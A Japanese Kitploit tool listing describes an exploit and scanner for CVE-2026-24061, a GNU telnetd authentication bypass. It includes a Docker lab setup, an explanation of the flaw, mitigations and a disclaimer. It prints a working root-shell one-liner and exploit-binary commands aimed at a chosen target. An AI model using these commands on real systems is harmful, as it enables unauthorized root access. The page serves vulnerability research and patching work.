Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061 — CVE-2026-24061 のエクスプロイトおよびスキャナー。telnetd の認証バイパスにより、細工した USER 環境変数を介して root シェルを取得します。Docker 環境のセットアップとクロスプラットフォーム対応のエクスプロイトバイナリを含みます。 | Kitploit
ツール/GitHubGitHub/parad0x7e/cve-2026-24061
脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト認証リモートアクセスツール
GitHubparad0x7e/cve-2026-24061

CVE-2026-24061

CVE-2026-24061 のエクスプロイトおよびスキャナー。telnetd の認証バイパスにより、細工した USER 環境変数を介して root シェルを取得します。Docker 環境のセットアップとクロスプラットフォーム対応のエクスプロイトバイナリを含みます。

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061: telnetd 認証バイパス脆弱性

CVE-2026-24061 は、telnetd における認証バイパス脆弱性であり、攻撃者が特定の環境変数の組み合わせを通じて本人確認を回避し、直接 root 権限のシェルを取得できるものです。

telnetd の認証ロジックには欠陥があります。-a オプション(自動ログイン)と特定の USER 環境変数(例: -f root)を組み合わせて使用すると、通常の認証プロセスをバイパスし、root ユーザーとして直接ログインすることが可能になります。

はじめに

GNU InetUtils は、GNU プロジェクトにおける基本的なネットワークツールのコレクションです。ftp、telnet、rsh、rlogin、tftp など、多くの伝統的なネットワーククライアントとデーモンが含まれており、包括的で GNU スタイルのネットワークコンポーネントライブラリを提供します。telnetd は、このツールキット内で受信した Telnet 接続要求を処理するサーバープログラムであり、主な役割はリモートユーザーに対話型ターミナルインターフェース(通常はシェル)を提供することです。

動作の仕組み

  1. 通常、ポート 23 で inetd または xinetd によって監視されます。要求が到着すると、telnetd が起動されます。
  2. Telnet プロトコル固有のオプション交渉(端末タイプ、ウィンドウサイズ、文字セットなど)を処理します。
  3. 通常、システムの基盤となる login プログラムを呼び出して、ユーザー名とパスワードを検証します。
  4. ログインが成功すると、ユーザーに疑似端末を割り当て、指定されたシェルを起動します。

参考情報

  • https://github.com/yanxinwu946/CVE-2026-24061--telnetd
  • https://github.com/vulhub/vulhub/
  • https://forum.butian.net/share/4766

環境構築

まず、このリポジトリをローカルにダウンロードします。ディレクトリ構造は以下のとおりです:

このディレクトリで、以下のコマンドを実行して CVE-2026-24061 の脆弱性環境を起動します:

root@kitploit:~
docker compose up -d --build

起動後、telnet サービスは 0.0.0.0:2323 で実行されます。

脆弱性の原理

  1. telnetd の -a オプションは、自動ログイン機能を有効にするために使用されます。
  2. -a が有効な場合、telnetd は USER 環境変数をログインユーザー名として読み取ります。
  3. USER 環境変数が -f root に設定されている場合、telnetd は -f をオプションフラグとして、root を対象ユーザーとして誤って解釈します。
  4. これにより認証チェックがバイパスされ、root ユーザーとして直接セッションが確立されます。

脆弱性の悪用

手動による悪用

root@kitploit:~
# USER 環境変数を設定し、telnet -a で接続します
env USER='-f root' telnet -a 127.0.0.1 2323

成功すると、root 権限を持つ対話型シェルが取得できます:

ツールによる悪用

root@kitploit:~
cd exp

exp、exp_darwin、exp.exe の3つのファイルが確認できます。これらはそれぞれ Linux、Mac、Windows 用の実行ファイルです。必要なものを選択してください。ツールのソースコードも提供されています。他のバージョンが必要な場合は、自分でコンパイルできます。ここでは Linux 用の exp を使用しています。詳細なヘルプ情報が含まれています。

脆弱性が存在するか検出します(デフォルトではポート 23 をスキャンします):

root@kitploit:~
./exp -mode scan -target your-ip -port your-port

脆弱性を悪用してシェルを取得します:

root@kitploit:~
./exp -mode exploit -target your-ip -port your-port

修正方法

  1. inetutils-telnetd を最新バージョンにアップグレードします。
  2. 本番環境では telnet サービスを無効にし、代わりに SSH を使用します。
  3. telnet サービスを隔離された内部ネットワーク環境に配置します。
  4. ファイアウォールを使用して、telnet サービスのアクセス元を制限します。

免責事項

このプロジェクトは、セキュリティ研究および教育目的のみで提供されています。許可されていないシステムで使用しないでください。このツールの使用によって生じるいかなる結果についても、ユーザーがすべての法的責任を負うものとします。

ツールをダウンロード